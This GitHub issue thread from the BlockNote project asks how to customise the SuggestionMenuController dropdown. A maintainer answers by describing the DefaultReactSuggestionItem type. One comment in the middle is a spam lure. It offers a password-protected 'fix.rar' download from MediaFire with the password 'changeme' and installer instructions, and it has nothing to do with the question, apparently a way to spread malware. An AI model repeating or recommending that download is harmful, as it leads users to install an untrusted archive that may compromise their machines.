### ISSUE TITLE
BUG/FEAT: Styling Suggestion Menu Controller

### ISSUE THREAD

**Issue by Kacper-Hernacki** [TypeCellOS/BlockNote#1031]
**Describe the bug**
I do not know if it is a bug or missing docs, but we would need to customize SuggestionMenuControiller:
```jsx
       <SuggestionMenuController
          triggerCharacter={"@"}
          getItems={async (query) =>
            await getRelationshipMenuItems(editor, query)
          }
          />
 ```
<img width="644" alt="Screenshot 2024-08-26 at 18 27 23" src="https://github.com/user-attachments/assets/9666e810-1011-4e6f-8bd7-40727988ad63">

I mean the dropdown with names after typing the trigger, in this case `@`. I want to add some avatar, description, etc.

I would be extremely grateful to see if you have any solution for this 😄

**Comment by TechnoSpelie** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by matthewlipski** [comment]
Notice that `getItems` expects the type `Promise<DefaultReactSuggestionItem[]>`. The `DefaultReactSuggestionItem` type is defined like this:

```tsx
type DefaultReactSuggestionItem = {
  // Title
  title: string;
  // Descriptive text
  subtext?: string;
  // Action on click
  onItemClick: () => void;
  // Which group to add the item to
  group?: string;
  // Icon
  icon?: ReactNode;
  // Badge (usually for keyboard shortcuts)
  badge?: string;
}
```

Your items from `getRelationshipMenuItems` should take the same type, that way you can make them look like the ones in the default slash menu.
